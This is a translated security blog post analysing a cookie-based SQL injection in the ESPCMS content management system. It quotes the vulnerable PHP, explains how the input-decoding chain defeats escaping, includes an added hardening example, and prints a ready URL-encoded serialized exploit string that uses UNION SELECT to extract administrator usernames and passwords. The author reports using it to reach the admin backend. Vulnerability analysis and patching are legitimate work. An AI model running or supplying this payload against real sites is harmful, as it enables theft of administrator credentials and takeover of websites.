
Analysis of the latest ESPCMS vulnerability: cookie injection

feng 2013/04/06 16:27  475 ℃  0 comments

0×00  Introduction:

Yisi ESPCMS is an enterprise website management system built on a LAMP stack. It is simple to operate, powerful, stable, extensible and secure, and convenient to customize and maintain, so it can help you quickly and easily build a strong, professional corporate website.

0×01  Vulnerability analysis:

```php
function in_list(){
    parent::start_pagetemplate();
    $lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
    $cartid = $this->fun->accept('ecisp_order_list', 'C'); // receives cookies['ecisp_order_list']
    $cartid = stripslashes(htmlspecialchars_decode($cartid));
    $uncartid = !empty($cartid) ? unserialize($cartid) : 0; // $cartid must follow a special (serialized) format
    if ($uncartid && is_array($uncartid)) {
        $didarray = $this->fun->key_array_name($uncartid, 'did', 'amount');
        $didlist = $this->fun->format_array_text(array_keys($didarray), ',');
        if (!empty($didlist)) {
            $db_table = db_prefix . 'document';
            $db_where = "isclass=1 AND isorder=1 AND did in($didlist) ORDER BY did DESC";
            $sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,color,author,source,pic,link,oprice,bprice,click,addtime,template,filename,filepath FROM $db_table WHERE $db_where"; // the SQL statement is built directly from the cookie-derived list
            $rs = $this->db->query($sql); // and passed straight into the query
            // ... (the excerpt on the page ends here)
        }
    }
}
```

The value of cookies['ecisp_order_list'] is read directly and, without any filtering, used to build the SQL statement and passed into the query. This creates a cookie injection.

0×02  Difficulties:

Along the way, the received cookies['ecisp_order_list'] passes through several functions: htmlspecialchars_decode(), stripslashes(), unserialize(), key_array_name(), array_keys() and format_array_text().

Among these, stripslashes() lets the injected statement ignore the effect of magic_quotes_gpc (GPC), since any slashes GPC added are removed again before the value is used.

However, the use of unserialize() makes building an exp harder, because the value passed to unserialize() must follow a prescribed special format (in fact, I have not fully digested this format myself).

Relying on luck and a small trick, I managed to build a working exp; I won't go into the details here. You can find a way to build one by printing the return values of the functions above (or by looking for patterns in the exp below).
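As an added example (not ESPCMS's own code), the following shows how the cookie handling from 0×01 and the decode chain from 0×02 can be hardened: the same htmlspecialchars_decode/stripslashes/unserialize steps are kept, but only validated integer document ids ever reach the SQL string, and unserialize() is forbidden from instantiating objects. The function names are assumptions, and the `allowed_classes` option and nullable return type assume PHP 7.1 or later.

```php
<?php
// Added example, not ESPCMS code: hardened handling of the ecisp_order_list cookie.
// Assumed helper names; the real CMS wraps this in $this->fun / $this->db calls.

function extract_order_dids(string $rawCookie): array
{
    // Same decoding chain as the vulnerable in_list(): cookie -> htmlspecialchars_decode -> stripslashes.
    $cartid = stripslashes(htmlspecialchars_decode($rawCookie));
    if ($cartid === '') {
        return [];
    }
    // Never let unserialize() build objects from cookie data (PHP 7+ option).
    $cart = @unserialize($cartid, ['allowed_classes' => false]);
    if (!is_array($cart)) {
        return [];
    }
    $dids = [];
    foreach ($cart as $item) {
        if (!is_array($item) || !isset($item['did'])) {
            continue;
        }
        // Accept only a canonical positive integer; anything else (including "24) and 1=2 ...") is dropped.
        $did = filter_var($item['did'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($did === false) {
            continue;
        }
        $dids[$did] = true; // de-duplicate, as array_keys(key_array_name(...)) did in the original
    }
    return array_keys($dids);
}

function build_order_where(array $dids): ?string
{
    if ($dids === []) {
        return null; // caller skips the query, matching the original empty($didlist) check
    }
    // $dids holds only ints, so the interpolated list contains nothing attacker-controlled.
    return 'isclass=1 AND isorder=1 AND did IN (' . implode(',', $dids) . ') ORDER BY did DESC';
}

// Constructed sample inputs: a legitimate cart, and the shape of the injection payload from the exp below.
$benign  = serialize(['k1' => ['did' => '24', 'amount' => 1], 'k2' => ['did' => 25, 'amount' => 2]]);
$hostile = serialize(['k23' => ['did' => '24) and 1=2 union select 1,2 from espcms_admin_member where 1 in (1', 'amount' => 1]]);

var_dump(build_order_where(extract_order_dids($benign)));
var_dump(build_order_where(extract_order_dids($hostile)));
```

The benign cart yields a WHERE clause with `did IN (24,25)`; the hostile cart yields null, because its `did` fails FILTER_VALIDATE_INT and no query is issued.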

0×03  EXP:

```
a%3a1%3a%7bs%3a3%3a%22k23%22%3ba%3a2%3a%7bs%3a3%3a%22did%22%3bs%3a159%3a%2224)+and+1%3d2+union+select+1%2c2%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2cpassword%2cusername%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2c26%2c27%2c28%2c29%2c30%2c31+from+espcms_admin_member+where+1+in+(1%22%3bs%3a6%3a%22amount%22%3bi%3a1%3b%7d%7d
```

0×04  Exploitation method:

Everyone knows how this goes; to keep the barrier to using the exp from being too low (it is already quite low), the exploitation steps are not shown one by one.

0×05  Demonstration:

Injection retrieving administrator information:

[Image: ESPCMS vulnerability screenshot]

Official backend:

[Image: ESPCMS vulnerability screenshot]

Author: n3wf

Article download: Baidu Netdisk
